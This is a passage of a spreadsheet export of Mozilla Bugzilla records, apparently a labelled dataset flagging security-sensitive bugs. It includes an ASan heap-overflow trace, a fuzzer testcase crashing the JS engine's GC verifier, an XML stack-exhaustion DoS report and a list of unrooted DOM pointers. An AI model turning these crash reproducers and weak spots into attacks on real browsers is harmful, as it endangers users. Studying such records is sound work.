    #7 0x7f9b5be408a6 in mozilla::dom::CanvasRenderingContext2D::EnsureTarget(mozilla::dom::CanvasRenderingContext2D::RenderingMode) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/canvas/CanvasRenderingContext2D.cpp:1376
    #8 0x7f9b5be43d40 in mozilla::dom::CanvasRenderingContext2D::Save() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/canvas/CanvasRenderingContext2D.cpp:1648
    #9 0x7f9b5b4d4b90 in mozilla::dom::CanvasRenderingContext2DBinding::save(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/dom/bindings/./CanvasRenderingContext2DBinding.cpp:1810
    #10 0x7f9b5bdbeb56 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/bindings/BindingUtils.cpp:2609
    #11 0x7f9b5f7f8ff2 in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/jscntxtinlines.h:235
    #12 0x7f9b5f7bbe82 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:720:16
    #13 0x7f9b5f7eac5e in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:2961
    #14 0x7f9b5f7d7fcb in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:677
    #15 0x7f9b5f7bbfe5 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:747
    #16 0x7f9b5f785ae4 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:784
    #17 0x7f9b600720a2 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/jsapi.cpp:4392
    #18 0x7f9b5a788456 in nsFrameMessageManager::ReceiveMessage(nsISupports*, nsIFrameLoader*, bool, nsAString_internal const&amp;, bool, mozilla::dom::StructuredCloneData const*, mozilla::jsipc::CpowHolder*, nsIPrincipal*, nsTArray&lt;mozilla::OwningSerializedStructuredCloneBuffer&gt;*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/base/nsFrameMessageManager.cpp:1253
    #19 0x7f9b5a7873cc in nsFrameMessageManager::ReceiveMessage(nsISupports*, nsIFrameLoader*, nsAString_internal const&amp;, bool, mozilla::dom::StructuredCloneData const*, mozilla::jsipc::CpowHolder*, nsIPrincipal*, nsTArray&lt;mozilla::OwningSerializedStructuredCloneBuffer&gt;*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/base/nsFrameMessageManager.cpp:1070
    #20 0x7f9b5caa5ead in mozilla::dom::TabChild::RecvAsyncMessage(nsString const&amp;, mozilla::dom::ClonedMessageData const&amp;, nsTArray&lt;mozilla::jsipc::CpowEntry&gt;&amp;&amp;, IPC::Principal const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/ipc/TabChild.cpp:2738
    #21 0x7f9b5caa5f4f in non-virtual thunk to mozilla::dom::TabChild::RecvAsyncMessage(nsString const&amp;, mozilla::dom::ClonedMessageData const&amp;, nsTArray&lt;mozilla::jsipc::CpowEntry&gt;&amp;&amp;, IPC::Principal const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/dom/ipc/Unified_cpp_dom_ipc0.cpp:2742
    #22 0x7f9b599d6971 in mozilla::dom::PBrowserChild::OnMessageReceived(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/ipc/ipdl/./PBrowserChild.cpp:2547
    #23 0x7f9b59ad4f7a in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/ipc/ipdl/./PContentChild.cpp:5316
    #24 0x7f9b595965a0 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/glue/MessageChannel.cpp:1279
    #25 0x7f9b59594e63 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/glue/MessageChannel.cpp:1198
    #26 0x7f9b5958c63c in mozilla::ipc::MessageChannel::OnMaybeDequeueOne() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/glue/MessageChannel.cpp:1182
    #27 0x7f9b59513661 in MessageLoop::RunTask(Task*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/chromium/src/base/message_loop.cc:361
    #28 0x7f9b595140df in MessageLoop::DeferOrRunPendingTask(MessageLoop::PendingTask const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/chromium/src/base/message_loop.cc:369
    #29 0x7f9b595146ba in MessageLoop::DoWork() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/chromium/src/base/message_loop.cc:456
SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/gfx/2d/DataSurfaceHelpers.cpp:81 mozilla::gfx::CopySurfaceDataToPackedArray(unsigned char*, unsigned char*, mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;, int, int)
Shadow bytes around the buggy address:
  0x0ff3e700b080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff3e700b090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff3e700b0a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff3e700b0b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff3e700b0c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0ff3e700b0d0: fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa
  0x0ff3e700b0e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff3e700b0f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff3e700b100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff3e700b110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff3e700b12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25926==ABORTING</t>
        </is>
      </c>
      <c r="X1267" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1268">
      <c r="A1268" t="n">
        <v>928158</v>
      </c>
      <c r="B1268" t="inlineStr">
        <is>
          <t>2013-10-17 15:53:23 -0700</t>
        </is>
      </c>
      <c r="C1268" t="inlineStr">
        <is>
          <t>Simulator should have its nice little home button</t>
        </is>
      </c>
      <c r="D1268" t="inlineStr">
        <is>
          <t>2020-01-21 14:21:09 -0800</t>
        </is>
      </c>
      <c r="E1268" t="n">
        <v>1</v>
      </c>
      <c r="F1268" t="n">
        <v>1</v>
      </c>
      <c r="G1268" t="n">
        <v>6</v>
      </c>
      <c r="H1268" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1268" t="inlineStr">
        <is>
          <t>DevTools Graveyard</t>
        </is>
      </c>
      <c r="J1268" t="inlineStr">
        <is>
          <t>WebIDE</t>
        </is>
      </c>
      <c r="K1268" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1268" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1268" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1268" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1268" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1268" t="inlineStr">
        <is>
          <t>[simulator]</t>
        </is>
      </c>
      <c r="Q1268" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1268" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1268" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1268" t="n">
        <v>1</v>
      </c>
      <c r="U1268" t="n">
        <v>0</v>
      </c>
      <c r="V1268" t="n">
        <v>5</v>
      </c>
      <c r="W1268" t="inlineStr">
        <is>
          <t>... instead of this huge, partially buggy gaia software button. The gaia software button is designed for tablet that doesn't have a physical button.
We shouldn't show it, unless we set the simulator in tablet mode.
It will allow use to take back some critical vertical space for smaller, and multiple button like home, rotation and may be revival of simulator geolocation.</t>
        </is>
      </c>
      <c r="X1268" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1269">
      <c r="A1269" t="n">
        <v>1349405</v>
      </c>
      <c r="B1269" t="inlineStr">
        <is>
          <t>2017-03-21 17:24:55 -0700</t>
        </is>
      </c>
      <c r="C1269" t="inlineStr">
        <is>
          <t>Delete .heroku/yarn/ during post_compile to reduce slug size</t>
        </is>
      </c>
      <c r="D1269" t="inlineStr">
        <is>
          <t>2017-03-28 06:08:35 -0700</t>
        </is>
      </c>
      <c r="E1269" t="n">
        <v>1</v>
      </c>
      <c r="F1269" t="n">
        <v>1</v>
      </c>
      <c r="G1269" t="n">
        <v>7</v>
      </c>
      <c r="H1269" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1269" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1269" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K1269" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1269" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1269" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1269" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1269" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1269" t="inlineStr"/>
      <c r="Q1269" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1269" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1269" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1269" t="n">
        <v>1</v>
      </c>
      <c r="U1269" t="n">
        <v>0</v>
      </c>
      <c r="V1269" t="n">
        <v>3</v>
      </c>
      <c r="W1269" t="inlineStr">
        <is>
          <t>Now that we're using yarn for Heroku builds (bug 1343960, bug 1343928), the slug includes an additional directory:
/app/.heroku/yarn/
...this is unused after the UI build, so can be removed like we do for the node binaries and node_modules (since it's 28MB/4500 files of unnecessary content).</t>
        </is>
      </c>
      <c r="X1269" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1270">
      <c r="A1270" t="n">
        <v>1264575</v>
      </c>
      <c r="B1270" t="inlineStr">
        <is>
          <t>2016-04-14 02:21:20 -0700</t>
        </is>
      </c>
      <c r="C1270" t="inlineStr">
        <is>
          <t>Assertion failure: [barrier verifier] Unmarked edge: object slot, at js/src/gc/Verifier.cpp:301</t>
        </is>
      </c>
      <c r="D1270" t="inlineStr">
        <is>
          <t>2016-09-22 17:22:25 -0700</t>
        </is>
      </c>
      <c r="E1270" t="n">
        <v>1</v>
      </c>
      <c r="F1270" t="n">
        <v>1</v>
      </c>
      <c r="G1270" t="n">
        <v>3</v>
      </c>
      <c r="H1270" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1270" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1270" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1270" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1270" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1270" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1270" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1270" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1270" t="inlineStr">
        <is>
          <t>[fuzzblocker] [jsbugmon:update][adv-main47+][adv-esr45.2+]</t>
        </is>
      </c>
      <c r="Q1270" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1270" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1270" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T1270" t="n">
        <v>1</v>
      </c>
      <c r="U1270" t="n">
        <v>0</v>
      </c>
      <c r="V1270" t="n">
        <v>20</v>
      </c>
      <c r="W1270" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 8630367f5e3f (build with --enable-debug --enable-more-deterministic, run with --fuzzing-safe --no-threads --ion-eager):
// Adapted from randomly chosen test: js/src/jit-test/tests/arguments/defaults-destructuring-mixed-default-value.js
function f(x, [y]) {}
f(0, []);
// jsfunfuzz-generated
for (var z of [0, 0, 0]) {
    verifyprebarriers();
}
Backtrace:
0   js-dbg-64-dm-clang-darwin-8630367f5e3f	0x0000000100a3dd07 js::gc::GCRuntime::endVerifyPreBarriers() + 1175 (Verifier.cpp:302)
1   js-dbg-64-dm-clang-darwin-8630367f5e3f	0x00000001005f7132 js::gc::GCRuntime::collect(bool, js::SliceBudget, JS::gcreason::Reason) + 210 (GCInternals.h:88)
2   js-dbg-64-dm-clang-darwin-8630367f5e3f	0x00000001005e6756 js::gc::GCRuntime::gc(JSGCInvocationKind, JS::gcreason::Reason) + 86 (jsgc.cpp:6536)
3   js-dbg-64-dm-clang-darwin-8630367f5e3f	0x0000000100588d8a js::DestroyContext(JSContext*, js::DestroyContextMode) + 458 (Utility.h:400)
4   js-dbg-64-dm-clang-darwin-8630367f5e3f	0x00000001000069cc main + 12396 (js.cpp:7467)
5   js-dbg-64-dm-clang-darwin-8630367f5e3f	0x00000001000019a4 start + 52
Setting s-s because gc seems to be involved.</t>
        </is>
      </c>
      <c r="X1270" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1271">
      <c r="A1271" t="n">
        <v>629211</v>
      </c>
      <c r="B1271" t="inlineStr">
        <is>
          <t>2011-01-26 16:01:35 -0800</t>
        </is>
      </c>
      <c r="C1271" t="inlineStr">
        <is>
          <t>Need Data Ageing Policy for Socorro</t>
        </is>
      </c>
      <c r="D1271" t="inlineStr">
        <is>
          <t>2011-12-30 10:54:39 -0800</t>
        </is>
      </c>
      <c r="E1271" t="n">
        <v>1</v>
      </c>
      <c r="F1271" t="n">
        <v>1</v>
      </c>
      <c r="G1271" t="n">
        <v>4</v>
      </c>
      <c r="H1271" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1271" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1271" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1271" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1271" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1271" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1271" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1271" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1271" t="inlineStr"/>
      <c r="Q1271" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1271" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1271" t="inlineStr">
        <is>
          <t>2.1</t>
        </is>
      </c>
      <c r="T1271" t="n">
        <v>1</v>
      </c>
      <c r="U1271" t="n">
        <v>0</v>
      </c>
      <c r="V1271" t="n">
        <v>16</v>
      </c>
      <c r="W1271" t="inlineStr">
        <is>
          <t>Before we can go "full throttle" on Socorro, or indeed before we can last another 6 months, we need to have a policy on "data ageing", i.e. what data we keep for how long, and what data we get rid of.  This is not a single number, but a set of numbers across the various different kinds of data we keep.  At the least, we need to decide how long we keep:
1. Base-level data
   a. raw dumps on HBase (Daniel suggest 6 months)
   b. processed dumps on HBase
   c. processed reports in PostgreSQL
2. Summary Data
   a. hourly summary and counts (TCBS etc.)
   b. daily smmary and counts (would be a rollup of (a))
   c. monthly/per product summary and counts (would be a rollup of (a))
Of the two, expiring (1) is far more important that expiring (2), which is comparatively much smaller.  However, both kinds of data need to expire eventually and be purged, so let's set a policy and automate it.
Expiration times could be based on the calendar, or based on product release dates.</t>
        </is>
      </c>
      <c r="X1271" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1272">
      <c r="A1272" t="n">
        <v>746482</v>
      </c>
      <c r="B1272" t="inlineStr">
        <is>
          <t>2012-04-17 23:00:58 -0700</t>
        </is>
      </c>
      <c r="C1272" t="inlineStr">
        <is>
          <t>XULRunner nightlies not moving to latest-mozilla-aurora anymore</t>
        </is>
      </c>
      <c r="D1272" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1272" t="n">
        <v>1</v>
      </c>
      <c r="F1272" t="n">
        <v>1</v>
      </c>
      <c r="G1272" t="n">
        <v>5</v>
      </c>
      <c r="H1272" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1272" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1272" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1272" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1272" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1272" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1272" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1272" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1272" t="inlineStr"/>
      <c r="Q1272" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1272" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1272" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1272" t="n">
        <v>1</v>
      </c>
      <c r="U1272" t="n">
        <v>0</v>
      </c>
      <c r="V1272" t="n">
        <v>2</v>
      </c>
      <c r="W1272" t="inlineStr">
        <is>
          <t>ftp://ftp.mozilla.org/pub/mozilla.org/xulrunner/nightly/2012/04/ has Aurora builds dated today.
ftp://ftp.mozilla.org/pub/mozilla.org/xulrunner/nightly/latest-mozilla-aurora/ has Aurora builds dated only as recently as April 1.</t>
        </is>
      </c>
      <c r="X1272" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1273">
      <c r="A1273" t="n">
        <v>21782</v>
      </c>
      <c r="B1273" t="inlineStr">
        <is>
          <t>1999-12-14 22:22:12 -0800</t>
        </is>
      </c>
      <c r="C1273" t="inlineStr">
        <is>
          <t>Perl module installations made easier</t>
        </is>
      </c>
      <c r="D1273" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:20 -0800</t>
        </is>
      </c>
      <c r="E1273" t="n">
        <v>1</v>
      </c>
      <c r="F1273" t="n">
        <v>1</v>
      </c>
      <c r="G1273" t="n">
        <v>4</v>
      </c>
      <c r="H1273" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1273" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1273" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K1273" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1273" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1273" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1273" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1273" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1273" t="inlineStr">
        <is>
          <t>2.12</t>
        </is>
      </c>
      <c r="Q1273" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1273" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1273" t="inlineStr">
        <is>
          <t>Bugzilla 2.12</t>
        </is>
      </c>
      <c r="T1273" t="n">
        <v>1</v>
      </c>
      <c r="U1273" t="n">
        <v>0</v>
      </c>
      <c r="V1273" t="n">
        <v>11</v>
      </c>
      <c r="W1273" t="inlineStr">
        <is>
          <t>the instructions in the README for installing the CPAN modules should be
  # perl -MCPAN -e shell
and then
 install module::number1 mod::number2
or just
 # perl -MCPAN -e 'install "DBI"' for installing DBI for example.
makes it a nobrainer, and makes you select a nearby mirror easily.
For building perl itself from source, you could hint that
./Configure -des &amp;&amp; make &amp;&amp; make test &amp;&amp; make install
usually does the job, and if not the INSTALL file included with the perl
distribution gives many useful hints.
 - ask (ask@perl.org)</t>
        </is>
      </c>
      <c r="X1273" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1274">
      <c r="A1274" t="n">
        <v>866827</v>
      </c>
      <c r="B1274" t="inlineStr">
        <is>
          <t>2013-04-29 11:18:57 -0700</t>
        </is>
      </c>
      <c r="C1274" t="inlineStr">
        <is>
          <t>make input not crawlable</t>
        </is>
      </c>
      <c r="D1274" t="inlineStr">
        <is>
          <t>2013-05-06 06:55:41 -0700</t>
        </is>
      </c>
      <c r="E1274" t="n">
        <v>1</v>
      </c>
      <c r="F1274" t="n">
        <v>1</v>
      </c>
      <c r="G1274" t="n">
        <v>6</v>
      </c>
      <c r="H1274" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1274" t="inlineStr">
        <is>
          <t>Input</t>
        </is>
      </c>
      <c r="J1274" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1274" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1274" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1274" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1274" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1274" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1274" t="inlineStr">
        <is>
          <t>u=user c=dashboard p=1 s=input.2013q2</t>
        </is>
      </c>
      <c r="Q1274" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1274" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1274" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1274" t="n">
        <v>1</v>
      </c>
      <c r="U1274" t="n">
        <v>0</v>
      </c>
      <c r="V1274" t="n">
        <v>4</v>
      </c>
      <c r="W1274" t="inlineStr">
        <is>
          <t>input data shouldn't be crawlable. Need to look at (and fix) the robots.txt file so that google and other friends aren't crawling the site.</t>
        </is>
      </c>
      <c r="X1274" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1275">
      <c r="A1275" t="n">
        <v>485941</v>
      </c>
      <c r="B1275" t="inlineStr">
        <is>
          <t>2009-03-30 08:40:46 -0700</t>
        </is>
      </c>
      <c r="C1275" t="inlineStr">
        <is>
          <t>Stack overflow using overly-deep XML tree (DoS)</t>
        </is>
      </c>
      <c r="D1275" t="inlineStr">
        <is>
          <t>2019-12-18 18:30:49 -0800</t>
        </is>
      </c>
      <c r="E1275" t="n">
        <v>1</v>
      </c>
      <c r="F1275" t="n">
        <v>1</v>
      </c>
      <c r="G1275" t="n">
        <v>3</v>
      </c>
      <c r="H1275" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1275" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1275" t="inlineStr">
        <is>
          <t>XML</t>
        </is>
      </c>
      <c r="K1275" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1275" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1275" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1275" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1275" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1275" t="inlineStr">
        <is>
          <t>[sg:dos][stack-exhaustion][needs patch][tbird crash]</t>
        </is>
      </c>
      <c r="Q1275" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1275" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1275" t="inlineStr">
        <is>
          <t>mozilla73</t>
        </is>
      </c>
      <c r="T1275" t="n">
        <v>1</v>
      </c>
      <c r="U1275" t="n">
        <v>5</v>
      </c>
      <c r="V1275" t="n">
        <v>102</v>
      </c>
      <c r="W1275" t="inlineStr">
        <is>
          <t>Created attachment 370016
PoC
I tested this both via HTTP and via file:// on trunk (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2a1pre) Gecko/20090323 Minefield/3.6a1pre), 3.5b4pre (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1b4pre) Gecko/20090330 Shiretoko/3.5b4pre), and 3.0.9pre (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9pre) Gecko/2009033004 GranParadiso/3.0.9pre).
In all three (x2) cases, all I got was "XML Parsing Error: no element found", "&lt;file path&gt;", and "Line Number 1, Column 228891:". No crash or anything...</t>
        </is>
      </c>
      <c r="X1275" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1276">
      <c r="A1276" t="n">
        <v>1249685</v>
      </c>
      <c r="B1276" t="inlineStr">
        <is>
          <t>2016-02-19 09:31:33 -0800</t>
        </is>
      </c>
      <c r="C1276" t="inlineStr">
        <is>
          <t>Root questionable-looking stack variables</t>
        </is>
      </c>
      <c r="D1276" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E1276" t="n">
        <v>1</v>
      </c>
      <c r="F1276" t="n">
        <v>1</v>
      </c>
      <c r="G1276" t="n">
        <v>3</v>
      </c>
      <c r="H1276" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1276" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1276" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1276" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1276" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1276" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1276" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1276" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1276" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main45+][adv-esr38.7+] dom-triaged btpp-active</t>
        </is>
      </c>
      <c r="Q1276" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1276" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1276" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T1276" t="n">
        <v>1</v>
      </c>
      <c r="U1276" t="n">
        <v>0</v>
      </c>
      <c r="V1276" t="n">
        <v>18</v>
      </c>
      <c r="W1276" t="inlineStr">
        <is>
          <t>I looked through where we call ReplaceChild(), AppendChild(), RemoveChild(), and InsertBefore() to find places that do not root |this| on the stack, and I found a few places that look sketchy. We should fix these. I'm not sure if it is worth trying to write a test case, or if we should treat these as real sec bugs or just more of an audit situation. I'll file a separate bug for adding a static analysis for these problems.
In HTMLTableElement::InsertRow(), parent is not rooted:
538         parent-&gt;AppendChild(*newRow, aError);
http://mxr.mozilla.org/mozilla-central/source/dom/html/HTMLTableElement.cpp#538
In nsTreeSanitizer::SanitizeChildren(), parent is not rooted:
1423           parent-&gt;InsertBefore(*child, node, rv);
http://mxr.mozilla.org/mozilla-central/source/dom/base/nsTreeSanitizer.cpp#1423
In HTMLSelectElement::Add(), parent is not rooted:
590   parent-&gt;InsertBefore(aElement, aBefore, aError);
http://mxr.mozilla.org/mozilla-central/source/dom/html/HTMLSelectElement.cpp#590
In nsRange::CutContents(), parent is not rooted:
2097         parent-&gt;RemoveChild(*node, error);
http://mxr.mozilla.org/mozilla-central/source/dom/base/nsRange.cpp#2097
There's some kind of mutation guard, but AFAICT in the scenario of a hostile mutation observer that destroys parent, it is already too late by the time we check the guard.</t>
